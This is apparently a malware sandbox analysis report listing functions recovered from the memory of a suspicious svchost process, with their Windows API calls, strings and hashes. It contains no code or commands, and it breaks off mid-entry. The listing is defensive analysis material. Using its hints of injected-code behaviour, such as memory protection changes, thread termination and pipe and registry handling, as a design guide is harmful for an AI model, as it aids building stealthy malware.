Instruction Fuzzy Hash: D8213C36B14A4083FB10CB25E54D35A77A4F38AFA5F584215EA5A13AA8CF3CC14DCB42

Function 000002A66130104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002A6613010AB
RegEnumValueW.ADVAPI32 ref: 000002A66130110E
GetProcessHeap.KERNEL32 ref: 000002A661301155
HeapAlloc.KERNEL32 ref: 000002A661301163
GetProcessHeap.KERNEL32 ref: 000002A661301187
HeapFree.KERNEL32 ref: 000002A661301195

Strings

d, xrefs: 000002A6613010CE

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 5125639fb1c4ff0c7cbb5d2a65fe4d13d97550c52107701ede0c85e5c89c4d54
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 94419173614B8097E764CF51E44839AB7B5F389B99F048125DB8A17B54DF3CC168CB40

Function 000002A6612D69F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002A6612D6A18
__scrt_acquire_startup_lock.LIBCMT ref: 000002A6612D6A6A
_RTC_Initialize.LIBCMT ref: 000002A6612D6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002A6612D6ABE
__scrt_release_startup_lock.LIBCMT ref: 000002A6612D6AE9

Memory Dump Source

Source File: 00000009.00000002.2984385637.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a6612d0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: fbc1adb9c41e37bcc120c75772abb7ef734b56d2905b7fa5b335fbd78ce71589
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: AC818961F006C18BFA64AB66D48D399769CAF87F80F4C8025EA4943696DF3CC9CD8302

Function 000002A6613075F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002A661307618
__scrt_acquire_startup_lock.LIBCMT ref: 000002A66130766A
_RTC_Initialize.LIBCMT ref: 000002A661307698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002A6613076BE
__scrt_release_startup_lock.LIBCMT ref: 000002A6613076E9

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 7ddb7ff4f809c3db95e285fe4209e61c8d899d6b3a3ce55c37dc94c9d2a4d2eb
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 8181E021F0064587FA50EB29984E3A926DCAB47F92F0C44159A8B77792DF3CC94EC792

Function 000002A661309804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 000002A661309889
GetLastError.KERNEL32 ref: 000002A661309897
LoadLibraryExW.KERNEL32 ref: 000002A6613098C1
FreeLibrary.KERNEL32 ref: 000002A661309907
GetProcAddress.KERNEL32 ref: 000002A661309913

Strings

api-ms-, xrefs: 000002A6613098A9

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 9bd910482f45c5d8184c8c718260f1b040edf69a8f8e68ff72a2fb9d4db38604
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 21318F31B12A5196EE11DF02A80C79967D8BB4AFA1F1E4525ED2F6B390DF3CC54D8342

Function 000002A661311B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 000002A661311BCD
GetLastError.KERNEL32 ref: 000002A661311BD9
CloseHandle.KERNEL32 ref: 000002A661311BF1
CreateFileW.KERNEL32 ref: 000002A661311C1C
WriteConsoleW.KERNEL32 ref: 000002A661311C3B

Strings

CONOUT$, xrefs: 000002A661311BFD

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: ead090be0ed3a0cdea6c2fc4ee05aebdc710564f3f58afb868419e84163d7b64
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 03118B31B14B5087E7508B52E84E31972B8F39AFE4F084224EA5B97798CF3CC9088741

Function 000002A661305C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002A661305C4B
GetThreadContext.KERNEL32 ref: 000002A661305DB5

Part of subcall function 000002A661305A40: GetCurrentThreadId.KERNEL32 ref: 000002A661305A44

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: ef55fef685f6e63ea46eb99b583f4df4a61f4aad81c91252b5b54e42dce67506
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: B4D1C876608B8882EA70DB0AE49C35A77E4F389F85F140216EACE57BA5CF3CC545CB41

Function 000002A6613030B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002A6613030D7
HeapAlloc.KERNEL32 ref: 000002A6613030EA
StrCmpNIW.SHLWAPI ref: 000002A66130316B
GetProcessHeap.KERNEL32 ref: 000002A6613031D1
HeapFree.KERNEL32 ref: 000002A6613031DF

Strings

dialer, xrefs: 000002A661303164

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 7c7cd99321ed215743737de429bd94f26eb07e2b3972f15d08d9bfc67b5388df
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 9431A221B01B5197EB19EF16A80D66977F8FB4AF95F0C4020DE4A27B54EF3CC4A98781

Function 000002A661301A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002A661301A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002A661301A58
PathFindFileNameW.SHLWAPI ref: 000002A661301A67
lstrlenW.KERNEL32 ref: 000002A661301A73
StrCpyW.SHLWAPI ref: 000002A661301A86
CloseHandle.KERNEL32 ref: 000002A661301A94

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 331f07f1c56a884374ab0073a6da1fef4a138c943355aa0f21201652e5049059
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 20015731B00A4197EA10EB12A85C35967A9FB89FD5F488435CE8A53754DF3CC98AC341

Function 000002A6613037AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002A6613037C8
GetCurrentProcess.KERNEL32 ref: 000002A6613037D6
VirtualProtectEx.KERNEL32 ref: 000002A6613037F8
GetCurrentProcess.KERNEL32 ref: 000002A661303819
VirtualProtectEx.KERNEL32 ref: 000002A66130383A
TerminateThread.KERNEL32 ref: 000002A661303849

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: a03370b0f1b99888e82360213d0c999877f66a98b6860f64e43c67a9d98e6456
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 74111B65B1174087FB25DB22E80E75676A8BB4AF91F080425CA4B27754EF3DC50C8742

Function 000002A6613090F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002A661309103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002A661309198
RtlUnwindEx.NTDLL ref: 000002A6613091E7

Strings

f, xrefs: 000002A661309116
csm, xrefs: 000002A66130917E

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 461482e568c637631849338c705f3eaada8f21a57059969d29b558982f2f280f
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: B5517632B116048BEB18CE25E44CB5937EDF346F99F598124DA1B67788EF39C849C782

Function 000002A6613090D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002A661309103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002A661309198
RtlUnwindEx.NTDLL ref: 000002A6613091E7

Strings

f, xrefs: 000002A661309116
csm, xrefs: 000002A66130917E

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 8cba797f111996638c92f3be6104cd123b816c25eff81f7ebdcd395d45cc5ed0
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: B3317432B0064097E618DF22E84CB1937A9F346F99F098118EA5B27785CF39C949C786

Function 000002A661301AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002A661301AD8
StrCmpNIW.SHLWAPI ref: 000002A661301AF2
lstrlenW.KERNEL32 ref: 000002A661301B01
StrCpyW.SHLWAPI ref: 000002A661301B16

Strings

\\?\, xrefs: 000002A661301AE6

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 2b181269923a5af29811523aae9a9715c4d76484b532f06836e06ca17225f93c
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: F1F04F72704A4193EB20DB25F49D399B7B9F745F99F888030CA8A57954DF2CC68DCB41

Function 000002A661303200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002A661303222
StrCpyW.SHLWAPI ref: 000002A661303232
StrCatW.SHLWAPI ref: 000002A66130323E
PathCombineW.SHLWAPI ref: 000002A66130324C

Strings

\\.\pipe\, xrefs: 000002A661303218

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: f5a1980f7c610e79436a11b398841ed97fec700dc0cbf7dd1e7166cb89351677
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 88F08220B04B8093EA00DB13F90E1597668AB4AFE1F0C8131DE9B27B28CF2CC49AC301

Function 000002A66130A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002A66130A154
GetProcAddress.KERNEL32 ref: 000002A66130A16A
FreeLibrary.KERNEL32 ref: 000002A66130A187

Strings

CorExitProcess, xrefs: 000002A66130A163
mscoree.dll, xrefs: 000002A66130A14B

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 4df176fab3eac4105edad8b9749e0397101cff3075760181ddbd3ecdbcb94a2e
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 22F01261B1164493EF589B60F88D36937A8EF49FD5F4C2419950B57674DF2CC58CC702

Function 000002A6613051B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002A661305236

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 90785e1c39c9657ebb0966d5b819a78446fd2ce121af7c2d17050c564d8ee3bb
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 3B02D932619B84C7E760CB59F49835AB7A4F3C6B91F141015EA8E97BA8DF7CC488CB41

Function 000002A661310860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002A6613108A2
GetConsoleMode.KERNEL32 ref: 000002A661310960
GetLastError.KERNEL32 ref: 000002A6613109EA

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 8aa0878b4f97bec40b88aa89525aaa0c74d8548bc027b4084bccae2cd63156eb
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: E481D132F106408AFB509B61885E3AD3AA9F746F94F4C4215DE4BB7A95DF3C846AC312

Function 000002A6613057F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002A661305806

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: fa1833fee047542339fb4bee660ae3a7f67998ead17e02992f85dbf256e6eae3
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 5061C736A19B80C7E760CB15E44C31AB7E8F38AB45F141115EA8E53BA8CF7CC548CB46

Function 000002A6612E12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002A6612E12E0
_set_statfp.LIBCMT ref: 000002A6612E12FB
_set_statfp.LIBCMT ref: 000002A6612E1317
_set_statfp.LIBCMT ref: 000002A6612E1353

Memory Dump Source

Source File: 00000009.00000002.2984385637.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a6612d0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 282d6ea6c085c75b559c4eecab295731d6df6bcc1aeec4f266239e96254006d3
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 5911A322F54AC003F6641375E45E36912BC6B57B74F4C0634AA7607BD78F1C8EC98102

Function 000002A661311EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002A661311EE0
_set_statfp.LIBCMT ref: 000002A661311EFB
_set_statfp.LIBCMT ref: 000002A661311F17
_set_statfp.LIBCMT ref: 000002A661311F53

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 78f1e09ebe91069fde2cfe5cecec6e314050ca4ced6c13427bf44ac0d6cc4aa3
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 8C119E36F58A0003F6A81178E55F3A97069AB77B74F1C0724AA7B276DA8F5C8C4E4202

Function 000002A661303878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002A661303886
GetCurrentProcess.KERNEL32 ref: 000002A6613038B4
VirtualProtectEx.KERNEL32 ref: 000002A6613038D6
GetCurrentProcess.KERNEL32 ref: 000002A6613038F4
VirtualProtectEx.KERNEL32 ref: 000002A661303915

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 5de2aea850e14d70eb11c96f7812abb78d1b7e8127be60e8cf67db41b6ecfb1c
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 8011182AB04B4087EB54DB11E40D76976A8FB4AF95F080029DE8A17794EF3DC5088741

Function 000002A6612D84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002A6612D8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002A6612D8598

Strings

f, xrefs: 000002A6612D8516
csm, xrefs: 000002A6612D857E

Memory Dump Source

Source File: 00000009.00000002.2984385637.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a6612d0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: a2496d3c7ddad3d354ece01c9d6e321c93b1a255c05b5a6eb78cde2e634084ab
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 6851AF32F126408BDB14CF25E84CB58339DFB42FA8F59A124DA4643788DF38D9C99746

Function 000002A6612D84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002A6612D8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002A6612D8598

Strings

f, xrefs: 000002A6612D8516
csm, xrefs: 000002A6612D857E

Memory Dump Source

Source File: 00000009.00000002.2984385637.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a6612d0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 12aedaf196ce0c41363de339bde528673567e858345642c02141eeaadbb587cc
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: D2316A76B1168097E7149F21E84CB5937ACFB42F98F5AA014EE5A07788CF3CC989D706

Function 000002A6613014B4 Relevance: 6.3, APIs: 5, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002A6613014D5
HeapFree.KERNEL32 ref: 000002A6613014E4
GetProcessHeap.KERNEL32 ref: 000002A6613014F0
HeapFree.KERNEL32 ref: 000002A6613014FF
GetProcessHeap.KERNEL32 ref: 000002A66130152A

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction ID: e67698bfd7912cac5bd800f33a611c970f87d1252693b1fcbc527840f8256d78
Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction Fuzzy Hash: C6115B72A14B8893E754EF66A84D21A77B4F78AF94F084029EB8B23755DF3CC0598741

Function 000002A6613026F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002A6613027D4
StrCpyW.SHLWAPI ref: 000002A6613027ED

Strings

\\.\pipe\, xrefs: 000002A6613027DF

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 8935ae60fd7875c6a519039d36bc47552768e08d90f04f0b2b20aad67cf4645d
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 0371B236B0078147EB64DA369A4C3AA67D8F746FC5F480016DE4B63B99DF39C608C782

Function 000002A6613024DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002A6613025C3
StrCpyW.SHLWAPI ref: 000002A6613025DA

Strings

\\.\pipe\, xrefs: 000002A6613025CE

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: d7711c9e83a1894a29492c74cbdb36065285409975d89d68dcb66489ac376cc9
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 4351EB32B0478583E6349E399A5C36AA6D9F387F91F1D0025CD8B23B99CF7DC4098B81

Function 000002A661310604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002A66131071B
GetLastError.KERNEL32 ref: 000002A66131073D

Strings

U, xrefs: 000002A6613106C7

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
